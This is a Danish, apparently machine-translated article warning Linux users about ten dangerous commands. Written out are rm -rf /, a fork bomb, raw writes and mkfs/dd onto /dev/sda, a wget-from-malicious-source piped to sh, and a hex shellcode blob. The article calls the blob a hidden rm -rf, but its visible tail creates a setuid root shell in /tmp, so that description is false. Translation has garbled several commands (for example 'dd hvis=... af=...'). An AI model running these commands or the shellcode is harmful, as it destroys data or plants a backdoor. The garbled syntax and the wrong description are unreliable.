10 mest farlige kommandoer - Du bør aldrig udføre på Linux


Linux-kommandolinjen er produktiv, nyttig og interessant, men nogle gange kan det være meget farligt, specielt når du ikke er sikker på hvad du laver. Denne artikel er ikke beregnet til at gøre dig rasende over Linux eller Linux kommandolinje. Vi vil bare gøre dig opmærksom på nogle af de kommandoer, som du bør tænke to gange, før du udfører dem.

1. rm -rf Kommando

Kommandoen rm -rf er en af den hurtigste måde at slette en mappe og dens indhold på. Men en lille tastefejl eller uvidenhed kan resultere i uoprettelige systemskader. Nogle af mulighederne, der bruges med rm-kommandoen, er.

  1. rm-kommandoen i Linux bruges til at slette filer.
  2. kommandoen rm -r sletter mappen rekursivt, selv den tomme mappe.
  3. rm -f-kommandoen fjerner 'skrivebeskyttet fil' uden at spørge.
  4. rm -rf /: Tving sletning af alt i rodmappen.
  5. rm -rf *: Tving sletning af alt i den aktuelle mappe/arbejdsmappe.
  6. rm -rf. : Tving sletning af den aktuelle mappe og undermapper.

Vær derfor forsigtig, når du udfører kommandoen rm -rf. For at overvinde utilsigtet sletning af fil med kommandoen 'rm' skal du oprette et alias med 'rm' -kommandoen som 'rm -i' i ".bashrc" -filen, den beder dig om at bekræfte enhver sletning.

2.:() {: |: &} ;: Kommando

Ovenstående er faktisk en gaffelbombe. Det fungerer ved at definere en funktion kaldet ':', som kalder sig selv to gange, en gang i forgrunden og en gang i baggrunden. Det fortsætter med at udføre igen og igen, indtil systemet fryser.

:(){:|:&};:

3. kommando>/dev/sda

Ovenstående kommando skriver output af 'kommando' på blokken/dev/sda. Ovenstående kommando skriver rådata, og alle filerne på blokken erstattes med rådata, hvilket resulterer i totalt tab af data på blokken.

4. mv-mappe/dev/null

Ovenstående kommando flytter 'mappe' til/dev/null. I Linux/dev/null eller null enhed er en speciel fil, der kasserer alle de data, der er skrevet til den, og rapporter om, at skriveoperationen lykkes.

# mv /home/user/* /dev/null

Ovenstående kommando flytter alt indholdet af en brugerkatalog til/dev/null, hvilket bogstaveligt betyder, at alt der blev sendt til blackhole (null).

5. wget http: // skadelig_kilde -O- | sh

Ovenstående kommando downloader et script fra en ondsindet kilde og udfører det derefter. Wget-kommandoen downloader scriptet, og sh udfører det downloadede script.

Bemærk: Du skal være meget opmærksom på kilden, hvorfra du downloader pakker og scripts. Brug kun de scripts/applikationer, der downloades fra en betroet kilde.

6. mkfs.ext3/dev/sda

Ovenstående kommando vil formatere blokken ‘sda’, og du ville helt sikkert vide, at efter udførelse af ovenstående kommando ville din blok (harddiskdrev) være ny, BRAND NEW! Uden data forlader dit system i et uopretteligt stadium.

7.> fil

Ovenstående kommando bruges til at skylle indholdet af filen. Hvis ovenstående kommando udføres med en tastefejl eller uvidenhed som “> xt.conf”, skriver konfigurationsfilen eller ethvert andet system eller konfigurationsfil.

8. ^ foo ^ bar

Denne kommando, som beskrevet i vores 10 mindre kendte Linux-kommandoer, bruges til at redigere den forrige kørselskommando uden behov for at indtaste hele kommandoen igen. Men dette kan virkelig være besværligt, hvis du ikke tog risikoen for grundigt at kontrollere ændringen i den originale kommando ved hjælp af ^ foo ^ bar-kommandoen.

9. dd hvis =/dev/tilfældig af =/dev/sda

Ovenstående kommando vil udslette blokken sda og skrive tilfældige uønskede data til blokken. Selvfølgelig! Dit system vil blive efterladt på et inkonsekvent og uopretteligt stadium.

10. Skjult kommandoen

Nedenstående kommando er intet andet end den første kommando ovenfor (rm -rf). Her er koderne skjult i hex, så en uvidende bruger kan narre. Hvis du kører nedenstående kode i din terminal, slettes din rodpartition.

Denne kommando her viser, at truslen måske er skjult og normalt ikke kan detekteres nogle gange. Du skal være opmærksom på, hvad du laver, og hvad der ville blive resultatet. Kompilér/kør ikke koder fra en ukendt kilde.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Bemærk: Udfør ikke nogen af ovenstående kommandoer i din Linux-terminal eller shell eller på din ven eller skolecomputer. Hvis du vil teste dem, skal du køre dem på en virtuel maskine. Enhver uoverensstemmelse eller tab af data på grund af udførelsen af ovenstående kommando vil nedbryde dit system, som hverken forfatteren af artiklen eller Tecmint er ansvarlige for.

Det er alt for nu. Jeg vil snart være her igen med en anden interessant artikel, som folk vil elske at læse. Indtil da Bliv afstemt og forbundet til Tecmint. Hvis du kender andre sådanne farlige Linux-kommandoer, og du gerne vil have os til at føje til listen, så fortæl os det via kommentarsektionen og glem ikke at give din værdifulde feedback.